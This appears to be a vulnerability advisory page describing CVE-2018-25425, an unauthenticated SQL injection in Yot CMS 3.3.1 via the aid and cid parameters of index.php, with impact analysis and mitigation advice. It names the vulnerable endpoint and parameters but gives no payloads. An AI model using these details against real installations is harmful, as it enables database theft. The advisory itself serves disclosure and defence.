CVE-2018-25425 in Yot
Summary
by MITRE • 05/30/2026
Yot CMS 3.3.1 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the aid and cid parameters. Attackers can send GET requests to index.php with crafted SQL payloads in the aid or cid parameters to extract database information including table and column names.
If you want to get best quality of vulnerability data, you may have to visit VulDB.
Analysis
by VulDB Data Team • 05/31/2026
Yot CMS version 3.3.1 suffers from a critical SQL injection vulnerability that exposes the application to unauthenticated attack vectors through improper input validation mechanisms. This vulnerability specifically affects the index.php endpoint where the aid and cid parameters are processed without adequate sanitization or parameterization, creating a direct pathway for malicious actors to manipulate the underlying database query execution. The flaw resides in the application's failure to implement proper input validation controls, allowing attackers to inject malicious SQL code that bypasses normal authentication and authorization checks.
The technical exploitation of this vulnerability follows a well-established pattern where attackers craft GET requests containing specially formatted SQL payloads within the aid or cid parameters. When these parameters are processed by the application's backend, the malicious code gets executed within the database context, enabling attackers to perform unauthorized operations. The vulnerability's impact extends beyond simple data extraction to include full database enumeration capabilities, allowing threat actors to discover table structures, column names, and potentially sensitive information stored within the database. This type of vulnerability falls under CWE-89 which specifically addresses SQL injection flaws in software applications.
The operational impact of this vulnerability is significant as it provides attackers with unrestricted access to the database content without requiring any authentication credentials. Unauthenticated attackers can leverage this weakness to extract sensitive information including user credentials, personal data, application configurations, and other confidential information stored within the database. The vulnerability's exposure through the index.php endpoint means that any user with knowledge of the application's structure can potentially exploit this weakness, making it particularly dangerous for publicly accessible web applications. This weakness aligns with ATT&CK technique T1213.002 which covers data from information repositories, demonstrating how attackers can access database contents through injection attacks.
Mitigation strategies should focus on implementing proper input validation and parameterized queries to prevent malicious SQL code execution. The application should enforce strict input sanitization on all user-supplied parameters, particularly those used in database operations. Implementing prepared statements with parameter binding would eliminate the risk of SQL injection by separating the SQL command structure from the data being processed. Additionally, the application should implement proper access controls and authentication mechanisms to limit database access to authorized users only. Regular security audits and input validation testing should be conducted to identify and remediate similar vulnerabilities in the application's codebase. The vulnerability also highlights the importance of keeping CMS applications updated with the latest security patches and following secure coding practices to prevent such injection attacks from occurring in the first place.